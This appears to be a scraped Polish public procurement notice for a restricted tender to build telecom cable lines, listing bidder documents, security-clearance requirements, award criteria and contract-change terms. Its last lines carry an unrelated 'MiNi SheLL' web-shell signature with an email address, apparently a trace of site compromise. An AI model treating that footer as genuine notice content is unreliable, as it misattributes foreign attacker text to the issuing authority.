3.	Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu lub kryteriów selekcji  zamieszcza informacje o tych podmiotach 
w oświadczeniu, o którym mowa w ust. 1 (załącznik nr 1 do wniosku o dopuszczenie do udziału 
w postępowaniu).
4.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców,  oświadczenie składa każdy 
z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia w zakresie, w którym każdy 
z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia.
5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy, składają jeden wniosek 
o dopuszczenie do udziału w postepowaniu przy czym do wniosku  należy dołączyć:
1) oryginał pełnomocnictwa lub kopii potwierdzonej notarialnie, który powinien zawierać 
w szczególności wskazanie:
- postępowania o zamówienie publiczne, którego dotyczy,
- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych 
   z nazwy z określeniem adresu siedziby,
- ustanowionego Pełnomocnika oraz zakresu jego umocowania.
Zakres umocowania musi obejmować przede wszystkim: reprezentowanie Wykonawców występujących wspólnie w postępowaniu o udzielenie zamówienia publicznego, zaciąganie w ich imieniu zobowiązań, złożenie oferty wspólnie, prowadzenie korespondencji i podejmowanie zobowiązań związanych 
z postępowaniem o zamówienie publiczne.
- dokument pełnomocnictwa musi być podpisany w imieniu wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym pełnomocnika i przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji wykonawcy.
2)  wymagane dokumenty i oświadczenia wskazane w sekcji 1 składa każdy z Wykonawców 
     oddzielnie,
3)  oświadczenie potwierdzające spełnianie warunków określonych w art. 22 ust. 1b ustawy Pzp  
     składa ustanowiony do reprezentowania Wykonawców Pełnomocnik.
W przypadku wyboru wspólnej oferty Wykonawców, Zamawiający zażąda przed zawarciem umowy 
w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
6.	W celu wykazania braku podstaw do wykluczenia z postępowania, o których  mowa w art. 24 ust. 5 pkt 1), 
Zamawiający wymaga złożenia wraz z wnoskiem o dopuszczenuie do udziału w postępowaniu: 
a)	odpisu z właściwego rejestru z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp. 
Ze względu na możliwość wydrukowania ww. dokumentu samodzielnie przez Zamawiającego, Wykonawca ma obowiązek wskazać na odrębnym oświadczeniu stanowiącym załącznik nr 2 
do Wniosku o dopuszczenie do udziału w postępowaniu  podstawowe informacje, które posłużą Zamawiającemu do pobrania i wydrukowania odpowiedniego odpisu z rejestru. Jeżeli dane będą prawidłowo wskazane, Zamawiający samodzielnie znajdzie i wydrukuje taki dokument bez obowiązku jego dołączenia do Wniosku w sprawie zakwalifikowania do udziału w postepowaniu przez Wykonawcę.
7.	W celu potwierdzenia, że Wykonawca spełniania   warunek, o których mowa  w art. 22 ust. 1b Ustawy Pzp dotyczącego posiadania  kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej o ile wynika to z odrębnych przepisów Zamawiający wymaga złożenia wraz z wraz z wnioskiem o dopuszczenie do udziału w postępowaniu:
a)	świadectwa bezpieczeństwa przemysłowego co najmniej trzeciego stopnia potwierdzającego zdolność Wykonawcy do ochrony informacji niejawnych oznaczonych klauzulą poufne;
b)	oświadczenie Wykonawcy o posiadaniu systemu teleinformatycznego umożliwiającego przetwarzanie informacji niejawnych o klauzuli zastrzeżone (załącznik nr 2 do  Wniosku o dopuszczenie do udziału w postepowaniu).
8.	W celu wykazania spełniania przez Wykonawcę warunku, o których mowa  w art. 22 ust. 1b Ustawy Pzp. dotyczącego sytuacji ekonomicznej i finansowej:
a)	   oświadczenie Wykonawcy dotyczące  spełniania warunków udziału w postępowaniu zgodnie z art. 
               22 ust. 1b ustawy  Pzp z wykorzystaniem wzoru  załącznik nr 3 do wnosku o dopuszczenie do 
             udziału w postępowaniu.
9.	 W celu wykazania spełniania przez Wykonawcę warunku, o których mowa  w art. 22 ust. 1b Ustawy Pzp. dotyczącego zdolności technicznej lub zawodowej 
a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane wraz z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji 
o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów 
 inne dokumenty z wykorzystaniem wzoru  załącznik nr 4 do wnosku o dopuszczenie do udziału 
w postępowaniu.
             Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu (zakończenu) w okresie ostatnich 5 
lat przed upływem  terminu składsania  wniosków o dopuszczenie do udziału  a jeżeli okres prowadzenia
działalności jest krótrzy  w tym okresie co najmnie 2 zadaniami (robotami budowlanymi) obejmujące swoim  zakresem budowę teletechnicznych linii kablowych  o wartości min. 300 000,00 zł. netto każda. 
                b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności
         odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz 
          z informacjami na temat ich kwalifikacji zawodowych uprawnień, doświadczenia i wykształcenia
          niezbędnych do wykonania zamówieni publicznego, a także zakresu wykonywanych przez nie 
         czynności oraz informacją o podstawie do  dysponowania tymi osobami.
10.	Wykonawca zgodnie z art. 24 ust. 11 ustawy Pzp  w terminie 3 dni od dnia przekazania informacji 
o której mowa w art. 51 ust. 1a  przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 (wg własnego wzoru). Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania 
z innym Wykonawcom nie prowadzą do zakłócenia konkurencji.
11.	Dokumenty podmiotów zagranicznych
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 5 rozporządzenia ministra rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia publicznego, wykonawca składa:
1)	informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania  lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, 
w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21oraz ust. 5 pkt 5 i 6 ustawy.
2)	składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	spełnia warunki z ochrony informacji niejawnych. (Dowody dotyczące zapewnienia bezpieczeństwa informacji niejawnych muszą spełniać wymagania wynikające z przepisów o ochronie informacji niejawnych. Zamawiający uznaje dokumenty uprawniające do dostępu do informacji niejawnych wydane przez inne państwa, jeżeli są równoważne poświadczeniu bezpieczeństwa o adekwatnej klauzuli tajności wydanemu zgodnie z przepisami o ochronie informacji niejawnych. Zamawiający może zwrócić się do właściwych organów o przedstawienie potwierdzenia, że poświadczenie bezpieczeństwa o adekwatnej klauzuli tajności wydane w innym państwie odpowiada poświadczeniu bezpieczeństwa o adekwatnej klauzuli tajności wydanemu zgodnie z przepisami o ochronie informacji niejawnych).
12.	Oświadczenia, o których mowa (Załączniki do Wniosku o dopuszczenie do udziału w postępowaniu)  dotyczące wykonawcy i innych podmiotów, na których zdolnościach lub sytuacji polega wykonawca na zasadach określonych w art. 22a ustawy oraz dotyczące podwykonawców, składane są w oryginale.
13.	Dokumenty, inne niż oświadczenia, składane są w oryginale lub kopii poświadczonej za zgodność 
z oryginałem.
14.	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą.
15.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Kopia aktualnego świadectwa bezpieczeństwa przemysłowego co najmniej trzeciego stopnia potwierdzające zdolność Wykonawcy do ochrony informacji niejawnych oznaczonych klauzulą poufne 
2) Oświadczenie o zdolności do ochrony informacji niejawnych (wzór druku nr 7).   
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg ograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  8<br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br />jak opisano w pkt. III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI Ogłoszenia o zamówieniu</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas realizacji</td><td>20</td></tr><tr><td>okres gwarancji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br />nie dotyczy<br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Umowa, która będzie podpisana w wyniku rozstrzygnięcia niniejszego postępowania o udzielenie zamówienia, 
 będzie zawierała zapisy podane w warunkach umowy stanowiące załącznik do niniejszej SIWZ.
2.	Zamawiający działając w oparciu o art. 144 ust. 1 ustawy Prawo zamówień publicznych określa następujące  
   okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku
   do treści złożonej oferty:
1)	wydłużenie gwarancji, 
2)	każdą zmianę w stosunku do treści oferty, która przyczyni się do obniżenia kosztów wykonania przedmiotu zamówienia (w szczególności związanych z rozwiązaniami technologicznymi, technicznymi i materiałowymi) z zachowaniem ogólnego rodzaju zamówienia, jego celu i charakteru,
3)	zmiana terminu wykonania (rozpoczęcia lub zakończenia) umowy lub terminów w harmonogramie robót w przypadku: 
a)	wystąpienia okoliczności o obiektywnym charakterze, których nie można było przewidzieć 
w chwili zawarcia umowy,
b)	wniesienia przez Zamawiającego istotnej zmiany wywołanej okolicznościami, których nie
można było przewidzieć w chwili zawarcia umowy, w dokumentacji projektowej, na  podstawie której Wykonawca wykonuje przedmiot umowy,
c)	wstrzymania realizacji przedmiotu (przestoje i opóźnienia) umowy przez Zamawiającego nie wynikającego z winy Wykonawcy
d)	zmiana terminu wykonania (rozpoczęcia lub zakończenia) umowy lub terminów 
w harmonogramie robót w wyniku zaistnienia okoliczności będących następstwem siły wyższej,
e)	zmiana jest uzasadniona potrzebami Zamawiającego;
4)	dotyczących zmiany kierownika budowy,  robót  oraz innych osób wyznaczonych do realizacji postanowień  przedmiotu umowy;
5)	w przypadku wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy;
6)	w przypadku  zmiany stawki urzędowej podatku od towarów i usług (VAT), przy czym Strony umowy postanawiają, że wynagrodzenie netto  nie ulega zmianie. Zmianie ulega kwota brutto obliczona na podstawie stawki tego podatku obowiązującej w chwili powstania obowiązku podatkowego i kwota podatku;
3. Wskazane powyżej okoliczności stanowiące podstawę do wprowadzenia aneksu do umowy, stanowią 
      uprawnienia  Zamawiającego (oprócz ppkt. 5, 6) nie zaś jego obowiązek. Okoliczności te nie mogą również 
      stanowić podstawy roszczeń wykonawcy o dodatkowe wynagrodzenie i/lub odszkodowanie. 
4.	Zgodnie z art. 144 ust 1 zakazuje się zmian postanowień zawartej umowy   w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zachodzi co najmniej jedna z następujących okoliczności:
1)	zmiany zakresu rzeczowego zamówienia wynikające z okoliczności, których nie można było przewidzieć (roboty dodatkowe wynikające z protokołów konieczności i warunkujące wykonanie zamówienia podstawowego);
2)	umowę w sprawie zamówienia będzie można zmienić, gdy modyfikacja:
a)	będzie wynikać z klauzuli kontraktowych;
b)	będzie konieczna na skutek potrzeby udzielenia zamówień dodatkowych;
c)	będzie konieczna z uwagi na nieprzewidziane okoliczności;
d)	ma nieistotny charakter;
e)	jest niskowartościowa w stosunku do wartości umowy.
5.   Formy aneksu nie wymaga aktualizacja danych zamawiającego i wykonawcy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />W siedzibie zamawiającego po uprzednim sprawdzeniu uprawnień do dostępu do informacji niejawnych (czynność po selekcji i zaroszeniu do składania ofert).<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />określono w zał. nr 2 do ogłoszenia o zamówieniu "Minimalne wymagana w zakresie ochrony informacji niejawnych" - strona internetowa zamawiającego<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 31/08/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Pozostałe informacje dotyczące przygotowania i złożenia wniosku o dopuszczenie do udział w niniejszym postępowaniu , złożenia oferty znajdują się na stronie internetowej zamawiającego. 
1) ogłoszenie o zamówieniu wraz z załącznikami,
2)SWIZ</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com